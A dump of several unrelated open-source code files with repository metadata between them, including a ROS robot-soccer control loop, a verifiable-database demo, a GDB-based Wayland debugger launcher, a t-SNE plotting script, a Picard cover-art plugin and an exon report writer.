r = rospy.Rate(1000) # Establecemos la frecuencia de publicación en 1000 Hz
jugadores_equipo = [golero, defensaIzquierda, defensaDerecho, atacante1, atacante2]
dis_cerca=10000
golero_x = 0 # Inicializamos la posición x del robot 0 en 0
golero_y = 0 # Inicializamos la posición y del robot 0 en 0
defensaIzquierda_x = 0 # Inicializamos la posición x del robot 1 en 0
defensaIzquierda_y = 0 # Inicializamos la posición y del robot 1 en 0
defensaDerecho_x = 0 # Inicializamos la posición x del robot 2 en 0
defensaDerecho_y = 0 # Inicializamos la posición y del robot 2 en 0
atacante1_x = 0 # Inicializamos la posición x del robot 3 en 0
atacante1_y = 0 # Inicializamos la posición y del robot 3 en 0
atacante2_x = 0 # Inicializamos la posición x del robot 4 en 0
atacante2_y = 0 # Inicializamos la posición y del robot 4 en 0
ball_x = 0 # Inicializamos la posición x del balón en 0
ball_y = 0 # Inicializamos la posición y del balón en 0
golero_msg = SSL() # Creamos una instancia del mensaje SSL para enviar comandos al robot
defensaIzquierda_msg = SSL() # Creamos una instancia del mensaje SSL para enviar comandos al
defensaDerecho_msg = SSL() # robot 2
atacante1_msg = SSL() # Creamos una instancia del mensaje SSL para enviar comandos al
atacante2_msg = SSL() # robot 4
while not rospy.is_shutdown():
try:
ball_x = ball[0].x # Obtenemos la posición x del balón #pelota.get_ubicacion()['x']
ball_y = ball[0].y # Obtenemos la posición y del balón #pelota.get_ubicacion()['y']
golero_x = golero.get_ubicacion()['x'] # Obtenemos la posición x del robot 0
golero_y = golero.get_ubicacion()['y']
defensaIzquierda_x = defensaIzquierda.get_ubicacion()['x']
defensaIzquierda_y = defensaIzquierda.get_ubicacion()['y']
defensaDerecho_x = defensaDerecho.get_ubicacion()['x']
defensaDerecho_y = defensaDerecho.get_ubicacion()['y']
atacante1_x = atacante1.get_ubicacion()['x']
atacante1_y = atacante1.get_ubicacion()['y']
atacante2_x = atacante2.get_ubicacion()['x']
atacante2_y = atacante2.get_ubicacion()['y']
except:
pass
golero_msg.kicker = 0
golero_msg.dribbler =False
defensaIzquierda_msg.kicker = 0
defensaIzquierda_msg.dribbler = False
defensaDerecho_msg.kicker = 0
defensaDerecho_msg.dribbler = False
atacante1_msg.kicker = 0
atacante1_msg.dribbler = False
atacante2_msg.kicker = 0
atacante2_msg.dribbler = False
######################################################################################
#Golero
#Calculamos la posicion de la pelota respeto al jugador
# Primero la distancia de la pelota al jugador, ESTIMAMOS El CUADRADO DE LA DISTANCIA
distance_ball_cua= ((ball_x - golero_x)**2 + (ball_y - golero_y )**2)
if ball_x > -800 and distance_ball_cua> 250000:
# Si la pelota esta lejos del golero y del arco el golero va a su posicion inicial
distance_pos = golero.set_posicion_distan()
if distance_pos< dis_cerca:
golero_msg = golero.mirar_frente(golero_msg) #se posiciona al frente
else:
golero_msg, orient = golero.ir_a_posicion(distance_pos,golero_msg) #vuelve a la psicion inicial
golero.set_orientacion(orient)
else:
# Si la pelota esta cerca del golero o se acerca al arco seguir la pelota
if distance_ball_cua<12100:
golero_msg = golero.agarra_pelota(golero_msg) #retiene la pelota
jugador_cercano = golero.jugador_cerca(jugadores_equipo,golero.posicion)
#calculamos la direccion
goal_angle = math.atan2(jugador_cercano.get_ubicacion()['y']- golero_y , jugador_cercano.get_ubicacion()['x']- golero_x)
heading_pase= goal_angle - golero.get_orientacion()
heading_pase= math.atan2(math.sin(heading_pase), math.cos(heading_pase))
#gira hasta mirar al jugador del pase
golero_msg = golero.pase_a_jugador(heading_pase,golero_msg)
else:
golero_msg = golero.ir_a_pelota(ball_x,ball_y,distance_ball_cua,golero_msg) #va a la pelota
#########################################################################3
#Defensa Izquierdo
#Calculamos la posicion de la pelota respeto al jugador
distance_ball_cua= ((ball_x - defensaIzquierda_x)**2 + (ball_y - defensaIzquierda_y) **2)
if distance_ball_cua> 250000 :
distance_pos=defensaIzquierda.set_posicion_distan()
if distance_pos< dis_cerca:
defensaIzquierda_msg=defensaIzquierda.mirar_frente(defensaIzquierda_msg)
else:
defensaIzquierda_msg, orient = defensaIzquierda.ir_a_posicion(distance_pos,defensaIzquierda_msg)
defensaIzquierda.set_orientacion(orient)
else:
# Si la pelota esta cerca del defensa
if distance_ball_cua< 12100:
defensaIzquierda_msg=defensaIzquierda.agarra_pelota(defensaIzquierda_msg)
jugador_cercano = defensaIzquierda.jugador_cerca(jugadores_equipo,defensaIzquierda.posicion)
#calculamos la direccion
goal_angle = math.atan2(jugador_cercano.get_ubicacion()['y']- defensaIzquierda_y , jugador_cercano.get_ubicacion()['x']- defensaIzquierda_x)
heading_pase= goal_angle - defensaIzquierda.get_orientacion()
heading_pase= math.atan2(math.sin(heading_pase), math.cos(heading_pase))
defensaIzquierda_msg=defensaIzquierda.pase_a_jugador(heading_pase, defensaIzquierda_msg)
else:
defensaIzquierda_msg=defensaIzquierda.ir_a_pelota(ball_x,ball_y,distance_ball_cua,defensaIzquierda_msg)
#########################################################################3
#Defensa Derecho
#Calculamos la posicion de la pelota respeto al jugador
distance_ball_cua= ((ball_x - defensaDerecho_x)**2 + (ball_y - defensaDerecho_y) **2)
if distance_ball_cua> 250000 :
distance_pos=defensaDerecho.set_posicion_distan()
if distance_pos< dis_cerca:
defensaDerecho_msg=defensaDerecho.mirar_frente(defensaDerecho_msg)
else:
# Si el jugador no está en su posición objetivo, moverse hacia allá
defensaDerecho_msg, orient = defensaDerecho.ir_a_posicion(distance_pos,defensaDerecho_msg)
else:
# Si la pelota esta cerca del defensa
if distance_ball_cua< 12100:
defensaDerecho_msg=defensaDerecho.agarra_pelota(defensaDerecho_msg)
jugador_cercano = defensaDerecho.jugador_cerca(jugadores_equipo,defensaDerecho.posicion)
#calculamos la direccion
goal_angle = math.atan2(jugador_cercano.get_ubicacion()['y']- defensaDerecho_y , jugador_cercano.get_ubicacion()['x']- defensaDerecho_x)
heading_pase= goal_angle - defensaDerecho.get_orientacion()
heading_pase= math.atan2(math.sin(heading_pase), math.cos(heading_pase))
defensaDerecho_msg=defensaDerecho.pase_a_jugador(heading_pase, defensaDerecho_msg)
else:
defensaDerecho_msg=defensaDerecho.ir_a_pelota(ball_x,ball_y,distance_ball_cua,defensaDerecho_msg)
#########################################################################3
#Atacante1
#Calculamos la posicion de la pelota respeto al jugador
distance_ball_cua= ((ball_x - atacante1_x)**2 + (ball_y - atacante1_y) **2)
if distance_ball_cua> 250000 :
distance_pos=atacante1.set_posicion_distan()
if distance_pos< dis_cerca:
atacante1_msg=atacante1.mirar_frente(atacante1_msg)
else:
# Si el jugador no está en su posición objetivo, moverse hacia allá
atacante1_msg, orient = atacante1.ir_a_posicion(distance_pos,atacante1_msg)
atacante1.set_orientacion(orient)
else:
# Si la pelota esta cerca del atacante
if distance_ball_cua< 12100:
atacante1_msg=atacante1.agarra_pelota(atacante1_msg)
atacante1_msg = atacante1.pateo_al_arco(atacante1_msg)
else:
atacante1_msg=atacante1.ir_a_pelota(ball_x,ball_y,distance_ball_cua,atacante1_msg)
#########################################################################3
#Atacante2
#Calculamos la posicion de la pelota respeto al jugador
distance_ball_cua= ((ball_x - atacante2_x)**2 + (ball_y - atacante2_y) **2)
if distance_ball_cua> 250000 :
distance_pos=atacante2.set_posicion_distan()
if distance_pos< dis_cerca:
atacante2_msg=atacante2.mirar_frente(atacante2_msg)
else:
atacante2_msg, orient = atacante2.ir_a_posicion(distance_pos,atacante2_msg)
atacante2.set_orientacion(orient)
else:
# Si la pelota esta cerca
if distance_ball_cua< 12100:
atacante2_msg=atacante2.agarra_pelota(atacante2_msg)
atacante2_msg = atacante2.pateo_al_arco(atacante2_msg)
else:
atacante2_msg=atacante2.ir_a_pelota(ball_x,ball_y,distance_ball_cua,atacante2_msg)
##########################################################
# Publicamos los mensajes de acciones para los robots
golero.publisher.publish(golero_msg)
defensaIzquierda.publisher.publish(defensaIzquierda_msg)
defensaDerecho.publisher.publish(defensaDerecho_msg)
atacante1.publisher.publish(atacante1_msg)
atacante2.publisher.publish(atacante2_msg)
r.sleep() | janddres/proy-grsim-robocup | grsim_pria.py | grsim_pria.py | py | 13,112 | python | es | code | 0 | github-code | 90 |
16364063378 | from __future__ import print_function
import json, sys, cmd
import cPickle as pickle
from verifiable_base import VerifiableBase
from verifiable_log import VerifiableLog
from verifiable_map import VerifiableMap, recalc_tree_hash
# Example general purpose verifiable database
# Mutation opertions append to its log
# Its verifiable map then calls the callback (_apply_operation) to change the view.
class VerifiableDatabase(VerifiableBase):
def __init__(self):
VerifiableBase.__init__(self, VerifiableLog())
# Private, call back for the underlying map when new entries are sequenced by the log
def _apply_operation(self, idx, operation, map):
op = json.loads(operation)
if op['operation'] == 'set':
map.put(str(op['key']), str(op['value']))
elif op['operation'] == 'delete':
map.put(str(op['key']), '')
# Example database operation
def set(self, key, value):
self._log.append(json.dumps({'operation': 'set', 'key': key, 'value': value}))
# Example database operation
def delete(self, key):
self._log.append(json.dumps({'operation': 'delete', 'key': key}))
# Return a value for a key and given tree_size (as returned by get_tree_head)
# Also returns proof
def get(self, key, tree_size):
val, proof = VerifiableBase.get(self, str(key), tree_size)
val = str(val) if len(val) else None
return val, proof
# Test right val is returned and inclusion proof checks out
def test(db, query, tree_size, exp_val):
val, proof = db.get(query, tree_size)
assert val == exp_val
assert recalc_tree_hash(query, str(val) if val else '', proof) == db.get_tree_head(tree_size)['sha256_root_hash']
class ReplCmd(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.prompt = '> '
self.do_new()
def do_sth(self, arg):
try:
if not len(arg.strip()):
seq = None
else:
seq = int(arg)
except:
self.help_sth()
return
print(self.db.get_tree_head(seq))
def help_sth(self):
print('sth <integer> - Updates tree to sequence number and print STH. Leave blank for latest.')
def do_new(self, arg=''):
self.db = VerifiableDatabase()
def help_new(self):
print('new - creates a new database, called by default upon launch')
def do_save(self, arg):
arg = arg.strip()
if not len(arg):
self.help_save()
return
pickle.dump(self.db, file(arg, 'wb'))
def help_save(self):
print('save <path> - save state to a path')
def do_load(self, arg):
arg = arg.strip()
if not len(arg):
self.help_load()
return
self.db = pickle.load(file(arg, 'rb'))
def help_load(self):
print('load <path> - load state from path')
def do_set(self, arg):
try:
n, v = arg.split(' ')
except:
self.help_set()
return
n = n.strip()
v = v.strip()
self.db.set(n, v)
self.do_get(n)
def help_set(self):
print('set <key> <value> - set key (string) to the specified value (string)')
def do_get(self, arg):
try:
n, v = arg.split(' ')
n = n.strip()
v = v.strip()
except:
n = arg.strip()
v = self.db.get_tree_head(None)['tree_size']
try:
v = int(v)
except:
self.help_get()
return
try:
val, proof = self.db.get(n, v)
except ValueError:
print('Tree size does not exist.')
return
print('Value: ', val)
print('Proof: ', proof)
print('Map hash: ', self.db.get_tree_head(v)['sha256_root_hash'])
print('Log hash: ', self.db.get_tree_head(v)['log_tree_head']['sha256_root_hash'])
print('Tree size: ', self.db.get_tree_head(v)['tree_size'])
def help_get(self):
print('get <key> <integer> - get value as of this sequence number. Leave blank for latest.')
def do_del(self, arg):
n = arg.strip()
self.db.delete(n)
self.do_get(n)
def help_del(self):
print('del <key> - delete key (string) from database')
def do_dump(self, arg=''):
try:
if not len(arg.strip()):
seq = None
else:
seq = int(arg)
except:
self.help_dump()
return
print('Tree:')
self.db.debug_dump(seq)
def help_dump(self):
print('dump <integer> - dump the tree as of this sequence number. Leave blank for latest.')
def do_log(self, arg=''):
for i, x in enumerate(self.db.get_log_entries(0, self.db.get_tree_head()['tree_size'] - 1)):
print(i, x)
def help_log(self):
print('log - dump all ops')
db = VerifiableDatabase()
db.set('foo', 'bar')
db.set('foo', 'baz')
db.delete('foo')
db.set('foo', 'bar')
db.get_tree_head()
test(db, 'foo', 0, None)
test(db, 'foo', 1, 'bar')
test(db, 'foo', 2, 'baz')
test(db, 'foo', 3, None)
test(db, 'foo', 4, 'bar')
if __name__ == '__main__':
ReplCmd().cmdloop('Type "help" to get started.')
| google/certificate-transparency | python/demo/vdb/demo_general_database.py | demo_general_database.py | py | 4,825 | python | en | code | 862 | github-code | 90 |
36665105867 |
CASES = int(input(''))
for x in range(CASES):
RANGES = input('').split()
LW, HR = int(RANGES[0]), int(RANGES[1])
LCM = LW*2
if LCM > HR:
print('-1 -1')
else:
print(LW, LW*2)
| ringedSquid/Stuy_CCC_Potd | Codeforces/1389A.py | 1389A.py | py | 213 | python | en | code | 0 | github-code | 90 |
40395856255 | # -*- coding:UTF-8 -*-
import urllib.request
import urllib.parse
url = 'https://ss0.bdstatic.com/70cFvHSh_Q1YnxGkpoWK1HF6hhy/it/u=2699817650,1238409640&fm=27&gp=0.jpg'
#爬取的时候需要一个头部,自己添加
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2'
}
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
with open('naza.jpg', 'wb') as f:
f.write(response.read())
| yuansuixin/learn-python-pacong4 | c_image.py | c_image.py | py | 530 | python | en | code | 0 | github-code | 90 |
18161209339 | N = int(input())
As = list(map(int, input().split()))
sum = 0
for i in range(N):
sum += As[i]
sum %= 10**9+7
ans = 0
for i in range(N):
sum -= As[i]
ans += As[i]*sum
ans %= 10**9+7
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02572/s119485925.py | s119485925.py | py | 215 | python | en | code | 0 | github-code | 90 |
36136243789 | import info
class subinfo(info.infoclass):
def setTargets(self):
ver = "3.0.3"
self.targets[ver] = f"https://downloads.sourceforge.net/project/libcsv/libcsv/libcsv-{ver}/libcsv-{ver}.tar.gz"
self.targetInstSrc[ver] = 'libcsv-'+ver
self.targetDigests[ver] = ("2f637343c3dfac80559595f519e8f78f25acc7c1")
self.defaultTarget = ver
from Package.AutoToolsPackageBase import *
class Package(AutoToolsPackageBase):
def __init__(self, **args):
AutoToolsPackageBase.__init__(self)
self.subinfo.options.configure.args = ""
self.subinfo.options.configure.autoreconf = False
| sklnet/craft-blueprints-tellico | libs/libcsv/libcsv.py | libcsv.py | py | 656 | python | en | code | 0 | github-code | 90 |
35286946391 | import subprocess
import os
from typing import List
from core.util import check_gdb
from frontends.tui import Arguments
def verify_has_debug_symbols(lib: str) -> None:
reallib = os.path.realpath(lib)
result = subprocess.run(['file', reallib], check=True, capture_output=True, encoding='utf-8')
if 'with debug_info' not in result.stdout:
raise RuntimeError(
lib + ' does not appear to have debug symbols. ' +
'See https://github.com/wmww/wayland-debug/blob/master/libwayland_debug_symbols.md ' +
'for more information')
def verify_gdb_available() -> None:
result = subprocess.run(['which', 'gdb'], capture_output=True)
if result.returncode != 0:
raise RuntimeError('gdb not found, install gdb to use gdb mode')
def run_gdb(args: Arguments, quiet: bool) -> int:
'''
Runs GDB, and runs a child instance of this script inside it as a plugin
Returns GDB's exit status, or -1 for other error
'''
# debugging infinitaly nested debuggers isn't fun
assert not check_gdb(), 'Tried to run GDB from inside GDB'
verify_gdb_available()
# Imports will be broken on the new instance, so we need to fix the python import path for the child process
env = os.environ.copy()
python_path_var = 'PYTHONPATH'
prev = ''
if python_path_var in env:
prev = ':' + env[python_path_var]
# Add the directeory the running file is located in to the path
env[python_path_var] = os.path.dirname(os.path.realpath(args.wayland_debug_args[0])) + prev
# Get libwayland libs and make sure they have debug symbols
if args.wayland_lib_dir is not None:
for lib in ['client', 'server']:
lib_path = os.path.join(args.wayland_lib_dir, 'libwayland-' + lib + '.so')
if os.path.exists(lib_path):
verify_has_debug_symbols(lib_path)
# Add libwayland libs to the LD_LIBRARY_PATH
env['LD_LIBRARY_PATH'] = ':'.join(filter(None, [args.wayland_lib_dir, env.get('LD_LIBRARY_PATH', '')]))
# All the args before the GDB option need to be sent along to the child instance
# Since we run the child instance from the GDB command, we need to pack them all in there
my_args_str = ', '.join('"' + i.replace('"', '\\"') + '"' for i in args.wayland_debug_args)
# Yes, this is exactly what it looks like. It's is python code, inside python code which runs python code
call_str = 'python import sys; sys.argv = [' + my_args_str + ']; exec(open("' + args.wayland_debug_args[0] + '").read())'
call_args = ['gdb', '-ex', call_str] + args.command_args
if not quiet:
print('Running subprocess: ' + repr(call_args))
sp = subprocess.Popen(call_args, env=env)
while True:
try:
sp.wait()
return sp.returncode
except KeyboardInterrupt:
pass
return -1
| wmww/wayland-debug | backends/gdb_plugin/runner.py | runner.py | py | 2,879 | python | en | code | 56 | github-code | 90 |
31686020847 | import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import os
import glob
import torch
from sklearn.manifold import TSNE
from biopy.datasets import DatasetMultiOmicsGDCTrainTest, DatasetMultiOmicsNatureA549, DatasetMultiOmicsNatureTrainTest
from biopy.utils import sample_encodings
from biopy.models import FC_VAE, NucleiImgVAE
def get_dataset(dataset_name, dataset_folder):
def gdc():
ds = DatasetMultiOmicsGDCTrainTest(folder=dataset_folder)
ds.set_omic('mRNA')
ds.log1p(all_omics=False)
ds.standardize(all_omics=True)
ds.feature_selection_by('mad', all_omics=True, top_n=2000)
legend_labels = ['', '', '', '', 'normal', 'tumor']
palette = ['#0d47a1', '#b71c1c', '#2196f3', '#f44336', '#90caf9', '#ef9a9a']
omics = ['mRNA', 'miRNA', 'meth27-450-preprocessed']
return ds, omics, (legend_labels, palette)
def cd4():
ds = DatasetMultiOmicsNatureTrainTest(folder=dataset_folder)
legend_labels = ['', '', 'poised', 'quiesc.']
palette = ['#E98616', '#8616E9', '#A86214', '#4d0f85']
omics = ['nuclei-images', 'rna']
return ds, omics, (legend_labels, palette)
def a549():
ds = DatasetMultiOmicsNatureA549(folder=dataset_folder)
ds.log1p(all_omics=True)
ds.standardize(all_omics=True)
legend_labels = ['', '', '', '0 hours', '1 hours', '3 hours']
palette = ['#E98616', '#16E986', '#8616E9', '#A86214','#14A862', '#4d0f85']
omics = ['rna', 'atac']
return ds, omics, (legend_labels, palette)
# Add here your additional datasets and/or preprocessings
return locals()[dataset_name]()
def get_models(ds, omics, model_name):
def gdc_vae():
return {omic: FC_VAE(data_size=ds.set_omic(omic)[0][0].shape[0],
hidden_size=80, n_hidden=ds.set_omic(omic)[0][0].shape[0],
last_hidden=100)
for omic in omics}
def cd4_vae():
return {'nuclei-images': NucleiImgVAE(data_size=1, hidden_size=128),
'rna': FC_VAE(data_size=7633, hidden_size=128, n_hidden=1024),
}
def a549_vae():
return {'atac': FC_VAE(data_size=815, n_hidden=815, hidden_size=50, last_hidden=100),
'rna': FC_VAE(data_size=2613, n_hidden=2613, hidden_size=50, last_hidden=100),
}
# Add here your additional models
return locals()[model_name]()
def get_latent_encodings(model, dataset, tsne=True, dim=2):
assert len(model) == len(dataset)
encodings = []
for i, mod in enumerate(model):
encodings.append(sample_encodings(mod, dataset[i], tsne=False))
encodings_py = np.concatenate(encodings)
if tsne:
encodings_py = TSNE(n_components=dim).fit_transform(encodings_py)
lab = []
for i, data in enumerate(dataset):
if hasattr(data, 'no_slicing'):
nlab = len(set(list(map(lambda x: x[1].numpy().item(), data))))
lab.append(np.array(list(map(lambda x: x[1] + (i * nlab), data))))
else:
nlab = len(set(data[0][:][1].numpy()))
lab.append(np.array([int(item[1]) + (i * nlab) for item in data]))
colors = np.concatenate(lab)
return encodings_py, colors
def main(dataset_name, dataset_folder, model_name, checkpoints, output_path):
ds, omics, (legend_labels, palette) = get_dataset(dataset_name, dataset_folder)
models = get_models(ds, omics, model_name)
datasets = []
for omic in omics:
model = models[omic]
model.load_state_dict(torch.load(checkpoints.format(omic=omic), map_location=torch.device('cpu')))
model.eval()
d = ds.set_omic(omic)
d.no_slicing = 'YES'
datasets.append(d)
encodings_py, colors = get_latent_encodings(model=[models[omic] for omic in omics], dataset=datasets)
fig, ax = plt.subplots(figsize=(6, 5))
sc = ax.scatter(encodings_py[:, 0], encodings_py[:, 1], c=colors, s=4,
cmap=mpl.colors.ListedColormap(palette))
ax.set_axis_off()
ax.set_xlim([-75, 75])
fig.savefig(output_path, dpi=300, bbox_inches='tight')
# Save the legend on a separate file
fig, ax = plt.subplots(figsize=(1, 1))
legend = ax.legend(sc.legend_elements()[0], legend_labels, loc='upper left',
title=" OMIC LABEL ", ncol=len(omics), columnspacing=-1)
legend.get_frame().set_alpha(None)
legend.get_frame().set_facecolor((0, 0, 0, 0))
ax.set_axis_off()
ax.set_xlim([-75, 75])
fig.savefig(f"{output_path}.legend.png", dpi=300, bbox_inches='tight')
| BioPyTeam/biopy | scripts/visualizer.py | visualizer.py | py | 4,782 | python | en | code | 0 | github-code | 90 |
29182171534 |
rol = str(input("Ingrese tu rut: "))
inverse = rol[::-1]
total = 0
for i in range(len(inverse)):
total = int(total) + ((i % 6) + 2) * int(inverse[i])
modulo = (total % 11) - 11
print(rol, modulo)
| Lucero1867/ejercicios.php | DigitoVerificador.py | DigitoVerificador.py | py | 206 | python | en | code | 0 | github-code | 90 |
14296599237 | PLUGIN_NAME = 'TheAudioDB cover art'
PLUGIN_AUTHOR = 'Philipp Wolfer'
PLUGIN_DESCRIPTION = 'Use cover art from TheAudioDB.'
PLUGIN_VERSION = "1.3.1"
PLUGIN_API_VERSIONS = ["2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6"]
PLUGIN_LICENSE = "GPL-2.0-or-later"
PLUGIN_LICENSE_URL = "https://www.gnu.org/licenses/gpl-2.0.html"
from base64 import b64decode
from PyQt5.QtCore import QUrl
from PyQt5.QtNetwork import QNetworkReply
from picard import config, log
from picard.coverart.providers import (
CoverArtProvider,
ProviderOptions,
register_cover_art_provider,
)
from picard.coverart.image import CoverArtImage
from picard.config import (
BoolOption,
TextOption,
)
from picard.webservice import ratecontrol
from .ui_options_theaudiodb import Ui_TheAudioDbOptionsPage
THEAUDIODB_HOST = "www.theaudiodb.com"
THEAUDIODB_PORT = 443
THEAUDIODB_APIKEY = 'MWQ2NTY1NjQ2OTRmMTM0ZDY1NjU2NA=='
OPTION_CDART_ALWAYS = "always"
OPTION_CDART_NEVER = "never"
OPTION_CDART_NOALBUMART = "noalbumart"
# No rate limit for TheAudioDB.
ratecontrol.set_minimum_delay((THEAUDIODB_HOST, THEAUDIODB_PORT), 0)
class TheAudioDbOptionsPage(ProviderOptions):
_options_ui = Ui_TheAudioDbOptionsPage
options = [
TextOption("setting", "theaudiodb_use_cdart", OPTION_CDART_NOALBUMART),
BoolOption("setting", "theaudiodb_use_high_quality", False),
]
def load(self):
if config.setting["theaudiodb_use_cdart"] == OPTION_CDART_ALWAYS:
self.ui.theaudiodb_cdart_use_always.setChecked(True)
elif config.setting["theaudiodb_use_cdart"] == OPTION_CDART_NEVER:
self.ui.theaudiodb_cdart_use_never.setChecked(True)
elif config.setting["theaudiodb_use_cdart"] == OPTION_CDART_NOALBUMART:
self.ui.theaudiodb_cdart_use_if_no_albumcover.setChecked(True)
self.ui.theaudiodb_use_high_quality.setChecked(
config.setting['theaudiodb_use_high_quality'])
def save(self):
if self.ui.theaudiodb_cdart_use_always.isChecked():
config.setting["theaudiodb_use_cdart"] = OPTION_CDART_ALWAYS
elif self.ui.theaudiodb_cdart_use_never.isChecked():
config.setting["theaudiodb_use_cdart"] = OPTION_CDART_NEVER
elif self.ui.theaudiodb_cdart_use_if_no_albumcover.isChecked():
config.setting["theaudiodb_use_cdart"] = OPTION_CDART_NOALBUMART
config.setting['theaudiodb_use_high_quality'] = self.ui.theaudiodb_use_high_quality.isChecked()
class TheAudioDbCoverArtImage(CoverArtImage):
"""Image from The Audio DB"""
support_types = True
sourceprefix = "AUDIODB"
def parse_url(self, url):
super().parse_url(url)
# Workaround for Picard always returning port 80 regardless of the
# scheme. No longer necessary for Picard >= 2.1.3
self.port = self.url.port(443 if self.url.scheme() == 'https' else 80)
class CoverArtProviderTheAudioDb(CoverArtProvider):
"""Use TheAudioDB to get cover art"""
NAME = "TheAudioDB"
TITLE = "TheAudioDB"
OPTIONS = TheAudioDbOptionsPage
def __init__(self, coverart):
super().__init__(coverart)
self.__api_key = b64decode(THEAUDIODB_APIKEY).decode()
def enabled(self):
return super().enabled() and not self.coverart.front_image_found
def queue_images(self):
release_group_id = self.metadata["musicbrainz_releasegroupid"]
path = "/api/v1/json/%s/album-mb.php" % self.__api_key
queryargs = {
"i": bytes(QUrl.toPercentEncoding(release_group_id)).decode()
}
log.debug("TheAudioDB: Queued download: %s?i=%s", path, queryargs["i"])
self.album.tagger.webservice.get(
THEAUDIODB_HOST,
THEAUDIODB_PORT,
path,
self._json_downloaded,
priority=True,
important=False,
parse_response_type='json',
queryargs=queryargs)
self.album._requests += 1
return CoverArtProvider.WAIT
def _json_downloaded(self, data, reply, error):
self.album._requests -= 1
if error:
if error != QNetworkReply.ContentNotFoundError:
error_level = log.error
else:
error_level = log.debug
error_level("TheAudioDB: Problem requesting metadata: %s", error)
else:
try:
releases = data.get("album")
if not releases:
log.debug("TheAudioDB: No cover art found for %s",
reply.url().url())
return
release = releases[0]
albumart_url = None
if config.setting['theaudiodb_use_high_quality']:
albumart_url = release.get("strAlbumThumbHQ")
if not albumart_url:
albumart_url = release.get("strAlbumThumb")
cdart_url = release.get("strAlbumCDart")
use_cdart = config.setting["theaudiodb_use_cdart"]
if albumart_url:
self._select_and_add_cover_art(albumart_url, ["front"])
if cdart_url and (use_cdart == OPTION_CDART_ALWAYS
or (use_cdart == OPTION_CDART_NOALBUMART
and not albumart_url)):
types = ["medium"]
if not albumart_url:
types.append("front")
self._select_and_add_cover_art(cdart_url, types)
except (TypeError):
log.error("TheAudioDB: Problem processing downloaded metadata", exc_info=True)
finally:
self.next_in_queue()
def _select_and_add_cover_art(self, url, types):
log.debug("TheAudioDB: Found artwork %s" % url)
self.queue_put(TheAudioDbCoverArtImage(url, types=types))
register_cover_art_provider(CoverArtProviderTheAudioDb)
| metabrainz/picard-plugins | plugins/theaudiodb/__init__.py | __init__.py | py | 5,963 | python | en | code | 130 | github-code | 90 |
23902075531 | import xlrd
from connect_db import connect_db
book = xlrd.open_workbook("C:/имя файла")
sheet = book.sheet_by_name("pos книга в файле")
database = connect_db()
cursor = database.cursor()
query = """INSERT INTO имя таблицы (имя колонки) VALUES (%s, %s)"""
for r in range(1, sheet.nrows):
Daily_Date = sheet.cell(r,0).value
Days = sheet.cell(r,1).value
values = (Daily_Date, Days)
cursor.execute(query, values)
cursor.close()
database.commit()
database.close() | besapuz/excel_bd | excel_in_SQL.py | excel_in_SQL.py | py | 524 | python | ru | code | 0 | github-code | 90 |
10921442712 | ##############################################################################
# Description #
##############################################################################
# This script allows the creation of the query_summary.xlsx file and the
# creation of the enrichment report.xlsx file
##############################################################################
# File #
##############################################################################
import xlsxwriter
from dictionnary import *
from rpy2.robjects.packages import importr
from rpy2.robjects.vectors import FloatVector
import numpy as np
group_nature2complete_name = { "NP": "Non polar", "NP-Alkyl": "Non polar alkyl",
"NP-aromatic": "Non polar and aromatic", "NPR": "Non polar restrained", "P": "Polar",
"PN": "Polar neutral", "PNC": "Polar uncharged", "PNC1": "Polar uncharged 1",
"PNC2" : "Polar uncharged 2", "PC": "Polar charged", "P-NC": "Polar negatively charged",
"P-PC": "Polar positively charged", "HC": "Hydrophobic chain", "H": "Hydrophobic",
"Aliphatic": "Aliphatic", "HS": "hydroxylated/sulfured", "Aromatic": "Aromatic"
}
##############################################################################
# Functions #
##############################################################################
# --------------------------- query_summary.xlsx -----------------------------
def size_adaptater(content):
"""
:param content: (list of list of string) the content of a sheet
:return: (list of int), list of column size : it will allow to set the appropriate size of each column in all
the sheets of the query_results.xlsx
"""
val = 0
for row in content:
if len(row) > val:
val = len(row)
res = [0] * val
for row in content:
for i in range(len(row)):
if res[i] < len(str(row[i])):
res[i] = len(str(row[i]))
return res
def sheet_filler(content, a_sheet, header_format, normal_format):
"""
Fills the sheet 'a_sheet' with the content 'content'
:param content: (list of list of string) the content of a sheet
:param a_sheet: (instance of xlsxwriter.worksheet.Worksheet) the sheet you want to fill
:param header_format: (instance of xlsxwriter.format.Format) the format of the header line
:param normal_format: (instance of xlsxwriter.format.Format) the format of normal lines
"""
i = 0
for row in content:
if i == 0 or 'Name : ' in row[0]:
a_sheet.write_row(i, 0, row, header_format)
else:
a_sheet.write_row(i, 0, row, normal_format)
i += 1
cell_size = size_adaptater(content)
for i in range(len(cell_size)):
a_sheet.set_column(i, i, cell_size[i]+2)
def writing_query_results_file(outpath, input_content, exon_list):
"""
Creates the file query_results.xlsx
:param outpath: (string) the path where the query_results.xlsx file will be created
:param input_content: (list of list of string) the content of the input sheet
:param exon_list: (instance of ListExon) a list of exon
"""
workbook = xlsxwriter.Workbook(outpath + "query_results.xlsx")
# setting the formats
header_format = workbook.add_format({'bg_color': '#00DCFF', 'align': 'center', 'valign': 'vcenter', 'border': True})
normal_format = workbook.add_format({'align': 'center', 'valign': 'vcenter', 'border': True})
# getting the sheet content
mapping_content = exon_list.get_content_mapping_sheet()
sequence_content = exon_list.get_content_sequence_sheet()
feature_content = exon_list.get_content_feature_sheet()
# creating the sheets...
input_sheet = workbook.add_worksheet("input")
mapping_sheet = workbook.add_worksheet("mapping")
sequence_sheet = workbook.add_worksheet("sequence")
feature_sheet = workbook.add_worksheet("feature")
# filling the sheets...
sheet_filler(input_content, input_sheet, header_format, normal_format)
sheet_filler(mapping_content, mapping_sheet, header_format, normal_format)
sheet_filler(sequence_content, sequence_sheet, header_format, normal_format)
sheet_filler(feature_content, feature_sheet, header_format, normal_format)
workbook.close()
# --------------------------- enrichment report.xlsx -----------------------------
def check_regulation(user_frequency, ic_90, p_value, p_value_corrected):
"""
:param user_frequency: (float) a frequency of a codon/amino acid/nature from the exon set given by the user
:param ic_90: (list of 2 floats) an interval containing 90% of the frequency of the codon/amino acid/nature of
interest
:param p_value: (float) a p_value indicating if the frequency of the codon/amino acid/nature of interest is
different from the frequency of the same codon/amino acid/nature in the control set
